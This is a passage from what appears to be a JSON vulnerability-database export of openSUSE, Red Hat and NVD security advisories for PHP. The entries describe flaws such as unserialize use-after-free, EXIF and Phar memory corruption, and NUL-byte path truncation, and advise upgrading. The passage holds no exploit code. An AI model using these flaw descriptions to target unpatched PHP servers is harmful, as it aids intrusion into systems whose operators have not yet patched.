gd_gif_in.c in GD 2.1.1 and\n earlier, as used in PHP allowed remote attackers to cause a denial of\n service (buffer over-read and application crash) via a crafted GIF image\n that is improperly handled by the gdImageCreateFromGif function\n (bsc#923945).\n - CVE-2015-2301: Use-after-free vulnerability in the phar_rename_archive\n function in phar_object.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via vectors\n that trigger an attempted renaming of a Phar archive to the name of an\n existing file (bsc#922452).\n - CVE-2015-2305: Integer overflow in the regcomp implementation in the\n Henry Spencer BSD regex library (aka rxspencer) 32-bit platforms might\n have allowed context-dependent attackers to execute arbitrary code via a\n large regular expression that leads to a heap-based buffer overflow\n (bsc#921950).\n - CVE-2014-9705: Heap-based buffer overflow in the\n enchant_broker_request_dict function in ext/enchant/enchant.c in PHP\n allowed remote attackers to execute arbitrary code via vectors that\n trigger creation of multiple dictionaries (bsc#922451).\n - CVE-2015-0273: Multiple use-after-free vulnerabilities in\n ext/date/php_date.c in PHP allowed remote attackers to execute arbitrary\n code via crafted serialized input containing a (1) R or (2) r type\n specifier in (a) DateTimeZone data handled by the\n php_date_timezone_initialize_from_hash function or (b) DateTime data\n handled by the php_date_initialize_from_hash function (bsc#918768).\n - CVE-2014-9652: The mconvert function in softmagic.c in file as used in\n the Fileinfo component in PHP did not properly handle a certain\n string-length field during a copy of a truncated version of a Pascal\n string, which might allowed remote attackers to cause a denial of\n service (out-of-bounds memory access and application crash) via a\n crafted file (bsc#917150).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0231: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate numerical keys within the\n serialized properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142 (bsc#910659).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0232: The exif_process_unicode function in ext/exif/exif.c in\n PHP allowed remote attackers to execute arbitrary code or cause a denial\n of service (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bsc#914690).\n - CVE-2014-3670: The exif_ifd_make_value function in exif.c in the EXIF\n extension in PHP operates on floating-point arrays incorrectly, which\n allowed remote attackers to cause a denial of service (heap memory\n corruption and application crash) or possibly execute arbitrary code via\n a crafted JPEG image with TIFF thumbnail data that is improperly handled\n by the exif_thumbnail function (bsc#902357).\n - CVE-2014-3669: Integer overflow in the object_custom function in\n ext/standard/var_unserializer.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an argument to the unserialize function that triggers\n calculation of a large length value (bsc#902360).\n - CVE-2014-3668: Buffer overflow in the date_from_ISO8601 function in the\n mkgmtime implementation in libxmlrpc/xmlrpc.c in the XMLRPC extension in\n PHP allowed remote attackers to cause a denial of service (application\n crash) via (1) a crafted first argument to the xmlrpc_set_type function\n or (2) a crafted argument to the xmlrpc_decode function, related to an\n out-of-bounds read operation (bsc#902368).\n - CVE-2014-5459: The PEAR_REST class in REST.php in PEAR in PHP allowed\n local users to write to arbitrary files via a symlink attack on a (1)\n rest.cachefile or (2) rest.cacheid file in /tmp/pear/cache/, related to\n the retrieveCacheFirst and useLocalCache functions (bsc#893849).\n - CVE-2014-3597: Multiple buffer overflows in the php_parserr function in\n ext/standard/dns.c in PHP allowed remote DNS servers to cause a denial\n of service (application crash) or possibly execute arbitrary code via a\n crafted DNS record, related to the dns_get_record function and the\n dn_expand function. NOTE: this issue exists because of an incomplete fix\n for CVE-2014-4049 (bsc#893853).\n - CVE-2014-4670: Use-after-free vulnerability in ext/spl/spl_dllist.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n iterator usage within applications in certain web-hosting environments\n (bsc#886059).\n - CVE-2014-4698: Use-after-free vulnerability in ext/spl/spl_array.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n ArrayIterator usage within applications in certain web-hosting\n environments (bsc#886060).\n - CVE-2014-4721: The phpinfo implementation in ext/standard/info.c in PHP\n did not ensure use of the string data type for the PHP_AUTH_PW,\n PHP_AUTH_TYPE, PHP_AUTH_USER, and PHP_SELF variables, which might\n allowed context-dependent attackers to obtain sensitive information from\n process memory by using the integer data type with crafted values,\n related to a "type confusion" vulnerability, as demonstrated by reading\n a private SSL key in an Apache HTTP Server web-hosting environment with\n mod_ssl and a PHP 5.3.x mod_php (bsc#885961).\n - CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file as\n used in the Fileinfo component in PHP allowed remote attackers to cause\n a denial of service (assertion failure and application exit) via a\n crafted CDF file (bsc#884986).\n - CVE-2014-3478: Buffer overflow in the mconvert function in softmagic.c\n in file as used in the Fileinfo component in PHP allowed remote\n attackers to cause a denial of service (application crash) via a crafted\n Pascal string in a FILE_PSTRING conversion (bsc#884987).\n - CVE-2014-3479: The cdf_check_stream_offset function in cdf.c in file as\n used in the Fileinfo component in PHP relies on incorrect sector-size\n data, which allowed remote attackers to cause a denial of service\n (application crash) via a crafted stream offset in a CDF file\n (bsc#884989).\n - CVE-2014-3480: The cdf_count_chain function in cdf.c in file as used in\n the Fileinfo component in PHP did not properly validate sector-count\n data, which allowed remote attackers to cause a denial of service\n (application crash) via a crafted CDF file (bsc#884990).\n - CVE-2014-3487: The cdf_read_property_info function in file as used in\n the Fileinfo component in PHP did not properly validate a stream offset,\n which allowed remote attackers to cause a denial of service (application\n crash) via a crafted CDF file (bsc#884991).\n - CVE-2014-3515: The SPL component in PHP incorrectly anticipates that\n certain data structures will have the array data type after\n unserialization, which allowed remote attackers to execute arbitrary\n code via a crafted string that triggers use of a Hashtable destructor,\n related to "type confusion" issues in (1) ArrayObject and (2)\n SPLObjectStorage (bsc#884992).\n\n These non-security issues were fixed:\n - bnc#935074: compare with SQL_NULL_DATA correctly\n - bnc#935074: fix segfault in odbc_fetch_array\n - bnc#919080: fix timezone map\n - bnc#925109: unserialize SoapClient type confusion\n\n", "published": "2016-06-21T13:08:17", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00041.html", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2014-9767", "CVE-2016-4342", "CVE-2015-2783", "CVE-2015-8873", "CVE-2015-5161", "CVE-2015-3329", "CVE-2014-3478", "CVE-2016-4540", "CVE-2016-4538", "CVE-2015-4644", "CVE-2015-8879", "CVE-2015-1352", "CVE-2016-3185", "CVE-2016-4544", "CVE-2015-2301", "CVE-2014-3515", "CVE-2014-3479", "CVE-2015-8867", "CVE-2014-9709", "CVE-2014-4670", "CVE-2015-2305", "CVE-2016-4543", "CVE-2014-3668", "CVE-2015-0273", "CVE-2016-4542", "CVE-2016-4541", "CVE-2014-3480", "CVE-2014-8142", "CVE-2015-4148", "CVE-2006-7243", "CVE-2014-0207", "CVE-2016-2554", "CVE-2014-3669", "CVE-2015-4024", "CVE-2015-8835", "CVE-2015-4021", "CVE-2014-3487", "CVE-2014-3597", "CVE-2015-6836", "CVE-2015-3152", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-6833", "CVE-2014-4721", "CVE-2016-4070", "CVE-2014-4698", "CVE-2015-8874", "CVE-2015-3411", "CVE-2015-4116", "CVE-2014-4049", "CVE-2015-6831", "CVE-2014-3670", "CVE-2015-5590", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2016-4539", "CVE-2015-6837", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-4073", "CVE-2015-7803", "CVE-2014-5459", "CVE-2015-4603", "CVE-2015-4599", "CVE-2016-5096", "CVE-2015-4598", "CVE-2015-8866", "CVE-2015-5589", "CVE-2016-3141", "CVE-2015-4643", "CVE-2015-8838", "CVE-2016-4346", "CVE-2015-0231", "CVE-2016-5114", "CVE-2004-1019", "CVE-2016-3142", "CVE-2015-6838", "CVE-2016-4537"], "lastseen": "2016-09-04T12:09:51"}], "redhat": [{"id": "RHSA-2016:2750", "type": "redhat", "title": "(RHSA-2016:2750) Moderate: rh-php56 security, bug fix, and enhancement update", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. The rh-php56 packages provide a recent stable release of PHP with PEAR 1.9.5 and enhanced language features including constant expressions, variadic functions, arguments unpacking, and the interactive debuger. The memcache, mongo, and XDebug extensions are also included.\n\nThe rh-php56 Software Collection has been upgraded to version 5.6.25, which provides a number of bug fixes and enhancements over the previous version. (BZ#1356157, BZ#1365401)\n\nSecurity Fixes in the rh-php56-php component:\n\n* Several Moderate and Low impact security issues were found in PHP. Under certain circumstances, these issues could cause PHP to crash, disclose portions of its memory, execute arbitrary code, or impact PHP application integrity. Space precludes documenting each of these issues in this advisory. Refer to the CVE links in the References section for a description of each of these vulnerabilities. (CVE-2013-7456, CVE-2014-9767, CVE-2015-8835, CVE-2015-8865, CVE-2015-8866, CVE-2015-8867, CVE-2015-8873, CVE-2015-8874, CVE-2015-8876, CVE-2015-8877, CVE-2015-8879, CVE-2016-1903, CVE-2016-2554, CVE-2016-3074, CVE-2016-3141, CVE-2016-3142, CVE-2016-4070, CVE-2016-4071, CVE-2016-4072, CVE-2016-4073, CVE-2016-4342, CVE-2016-4343, CVE-2016-4473, CVE-2016-4537, CVE-2016-4538, CVE-2016-4539, CVE-2016-4540, CVE-2016-4541, CVE-2016-4542, CVE-2016-4543, CVE-2016-4544, CVE-2016-5093, CVE-2016-5094, CVE-2016-5096, CVE-2016-5114, CVE-2016-5399, CVE-2016-5766, CVE-2016-5767, CVE-2016-5768, CVE-2016-5770, CVE-2016-5771, CVE-2016-5772, CVE-2016-5773, CVE-2016-6128, CVE-2016-6207, CVE-2016-6288, CVE-2016-6289, CVE-2016-6290, CVE-2016-6291, CVE-2016-6292, CVE-2016-6294, CVE-2016-6295, CVE-2016-6296, CVE-2016-6297, CVE-2016-7124, CVE-2016-7125, CVE-2016-7126, CVE-2016-7127, CVE-2016-7128, CVE-2016-7129, CVE-2016-7130, CVE-2016-7131, CVE-2016-7132)\n\n* Multiple flaws were found in the PCRE library included with the rh-php56-php packages for Red Hat Enterprise Linux 6. A specially crafted regular expression could cause PHP to crash or, possibly, execute arbitrary code. (CVE-2015-2325, CVE-2015-2326, CVE-2015-2327, CVE-2015-2328, CVE-2015-3210, CVE-2015-3217, CVE-2015-5073, CVE-2015-8381, CVE-2015-8383, CVE-2015-8384, CVE-2015-8385, CVE-2015-8386, CVE-2015-8388, CVE-2015-8391, CVE-2015-8392, CVE-2015-8395)\n\nRed Hat would like to thank Hans Jerry Illikainen for reporting CVE-2016-3074, CVE-2016-4473, and CVE-2016-5399.", "published": "2016-11-15T16:13:31", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2016:2750", "cvelist": ["CVE-2013-7456", "CVE-2014-9767", "CVE-2015-2325", "CVE-2015-2326", "CVE-2015-2327", "CVE-2015-2328", "CVE-2015-3210", "CVE-2015-3217", "CVE-2015-5073", "CVE-2015-8381", "CVE-2015-8383", "CVE-2015-8384", "CVE-2015-8385", "CVE-2015-8386", "CVE-2015-8388", "CVE-2015-8391", "CVE-2015-8392", "CVE-2015-8395", "CVE-2015-8835", "CVE-2015-8865", "CVE-2015-8866", "CVE-2015-8867", "CVE-2015-8873", "CVE-2015-8874", "CVE-2015-8876", "CVE-2015-8877", "CVE-2015-8879", "CVE-2015-8935", "CVE-2016-1903", "CVE-2016-2554", "CVE-2016-3074", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-4070", "CVE-2016-4071", "CVE-2016-4072", "CVE-2016-4073", "CVE-2016-4342", "CVE-2016-4343", "CVE-2016-4473", "CVE-2016-4537", "CVE-2016-4538", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-4544", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5096", "CVE-2016-5114", "CVE-2016-5399", "CVE-2016-5766", "CVE-2016-5767", "CVE-2016-5768", "CVE-2016-5770", "CVE-2016-5771", "CVE-2016-5772", "CVE-2016-5773", "CVE-2016-6128", "CVE-2016-6207", "CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-6295", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7126", "CVE-2016-7127", "CVE-2016-7128", "CVE-2016-7129", "CVE-2016-7130", "CVE-2016-7131", "CVE-2016-7132"], "lastseen": "2018-06-13T00:00:47"}, {"id": "RHSA-2015:1219", "type": "redhat", "title": "(RHSA-2015:1219) Moderate: php54-php security update", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4025, CVE-2015-4026, CVE-2015-4598)\n\nAn integer underflow flaw leading to out-of-bounds memory access was found\nin the way PHP's Phar extension parsed Phar archives. A specially crafted\narchive could cause PHP to crash or, possibly, execute arbitrary code when\nopened. (CVE-2015-4021)\n\nAll php54-php users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd service must be restarted for the update\nto take effect.\n", "published": "2015-07-09T04:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://access.redhat.com/errata/RHSA-2015:1219", "cvelist": ["CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4598", "CVE-2015-4643", "CVE-2015-4644"], "lastseen": "2018-06-16T00:39:18"}, {"id": "RHSA-2015:1187", "type": "redhat", "title": "(RHSA-2015:1187) Important: rh-php56-php security update", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4025, CVE-2015-4026, CVE-2015-3411,\nCVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2783,\nCVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2015-4604,\nCVE-2015-4605)\n\nAll rh-php56-php users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd24-httpd service must be restarted for the\nupdate to take effect.\n", "published": "2015-06-25T04:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2015:1187", "cvelist": ["CVE-2015-2783", "CVE-2015-3307", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4598", "CVE-2015-4602", "CVE-2015-4603", "CVE-2015-4604", "CVE-2015-4605", "CVE-2015-4643", "CVE-2015-4644"], "lastseen": "2018-06-13T00:00:37"}, {"id": "RHSA-2015:1186", "type": "redhat", "title": "(RHSA-2015:1186) Important: php55-php security update", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4025, CVE-2015-4026, CVE-2015-3411,\nCVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2783,\nCVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2015-4604,\nCVE-2015-4605)\n\nAll php55-php users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd24-httpd service must be restarted for the\nupdate to take effect.\n", "published": "2015-06-25T04:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2015:1186", "cvelist": ["CVE-2015-2783", "CVE-2015-3307", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4598", "CVE-2015-4602", "CVE-2015-4603", "CVE-2015-4604", "CVE-2015-4605", "CVE-2015-4643", "CVE-2015-4644"], "lastseen": "2018-06-13T00:00:07"}, {"id": "RHSA-2015:1135", "type": "redhat", "title": "(RHSA-2015:1135) Important: php security and bug fix update", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption.\n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n", "published": "2015-06-23T04:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2015:1135", "cvelist": ["CVE-2014-8142", "CVE-2014-9652", "CVE-2014-9705", "CVE-2014-9709", "CVE-2015-0231", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-2301", "CVE-2015-2348", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3307", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-4148", "CVE-2015-4598", "CVE-2015-4599", "CVE-2015-4600", "CVE-2015-4601", "CVE-2015-4602", "CVE-2015-4603", "CVE-2015-4604", "CVE-2015-4605", "CVE-2015-4643"], "lastseen": "2018-04-15T16:22:08"}, {"id": "RHSA-2015:1218", "type": "redhat", "title": "(RHSA-2015:1218) Moderate: php security update", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-0273, CVE-2015-2787, CVE-2015-4147,\nCVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602,\nCVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4026, CVE-2015-3411, CVE-2015-3412,\nCVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy() function in\nthe PHP ZTS module. This flaw could possibly cause a PHP application to\ncrash. (CVE-2014-9425)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n", "published": "2015-07-09T04:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2015:1218", "cvelist": ["CVE-2014-9425", "CVE-2014-9705", "CVE-2014-9709", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-2301", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3307", "CVE-2015-3329", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-4148", "CVE-2015-4598", "CVE-2015-4599", "CVE-2015-4600", "CVE-2015-4601", "CVE-2015-4602", "CVE-2015-4603"], "lastseen": "2018-06-12T23:59:35"}], "cve": [{"id": "CVE-2015-4025", "type": "cve", "title": "CVE-2015-4025", "description": "PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \\x00 character in certain situations, which allows remote attackers to bypass intended extension restrictions and access files or directories with unexpected names via a crafted argument to (1) set_include_path, (2) tempnam, (3) rmdir, or (4) readlink. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243.", "published": "2015-06-09T14:59:07", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4025", "cvelist": ["CVE-2015-4025"], "lastseen": "2018-01-05T11:51:41"}, {"id": "CVE-2015-4024", "type": "cve", "title": "CVE-2015-4024", "description": "Algorithmic complexity vulnerability in the multipart_buffer_headers function in main/rfc1867.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 allows remote attackers to cause a denial of service (CPU consumption) via crafted form data that triggers an improper order-of-growth outcome.", "published": "2015-06-09T14:59:06", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4024", "cvelist": ["CVE-2015-4024"], "lastseen": "2018-01-05T11:51:41"}, {"id": "CVE-2015-4021", "type": "cve", "title": "CVE-2015-4021", "description": "The phar_parse_tarfile function in ext/phar/tar.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 does not verify that the first character of a filename is different from the \\0 character, which allows remote attackers to cause a denial of service (integer underflow and memory corruption) via a crafted entry in a tar archive.", "published": "2015-06-09T14:59:04", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4021", "cvelist": ["CVE-2015-4021"], "lastseen": "2018-01-05T11:51:41"}, {"id": "CVE-2015-4026", "type": "cve", "title": "CVE-2015-4026", "description": "The pcntl_exec implementation in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \\x00 character, which might allow remote attackers to bypass intended extension 